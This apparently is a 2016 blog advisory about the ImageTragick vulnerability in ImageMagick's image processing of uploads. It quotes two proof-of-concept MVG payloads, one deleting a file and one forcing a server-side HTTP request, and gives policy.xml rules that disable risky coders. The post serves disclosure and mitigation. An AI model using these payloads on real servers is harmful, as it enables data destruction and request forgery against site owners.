So yes, if your server is running ImageMagick it is not vulnerable, but if your web application allows users to upload an image, which is processed by ImageMagick (for example, watermarked or resized), then your server is vulnerable.
If your Drupal, Wordpress or similar web application leverages ImageMagick's simple processing tools, your server may be insecure... This may allow an attacker to gain access to credentials, customer information, or anything else on your server. The exploit for this vulnerability has been named ImageTragick. A dedicated website has been setup. Branding a flaw: could look like a laugh, but perhaps the best way to spread the word? The flaw is ridiculously simple, and script kiddie could be using it in the wild: Examples (from imagetragick.com)1. File Deletion
delete.mvg
push graphic-context viewbox 0 0 640 480 image over 0,0 0,0 'ephemeral:/tmp/delete.txt' popgraphic-context
$ cat "goodbye, file" > /tmp/delete.txt $ convert delete.mvg out.png # deletes /tmp/delete.txt
2. Create a GET or FTP request
get.mvg
push graphic-context viewbox 0 0 640 480 fill 'url(http://example.com/)' pop graphic-context
Http request to example.com
$ convert get.mvg out.png
ImageMagick have responded with a fix
If your site is vulnerable, I suggest reading more about the flaw at imagemagick.com, or simply add the following to your policy.xml file:
<policy domain="coder" rights="none" pattern="EPHEMERAL" /> <policy domain="coder" rights="none" pattern="HTTPS" /> <policy domain="coder" rights="none" pattern="MVG" /> <policy domain="coder" rights="none" pattern="MSL" /> <policy domain="coder" rights="none" pattern="TEXT" /> <policy domain="coder" rights="none" pattern="SHOW" /> <policy domain="coder" rights="none" pattern="WIN" /> <policy domain="coder" rights="none" pattern="PLT" />
Saturday, May 7, 2016
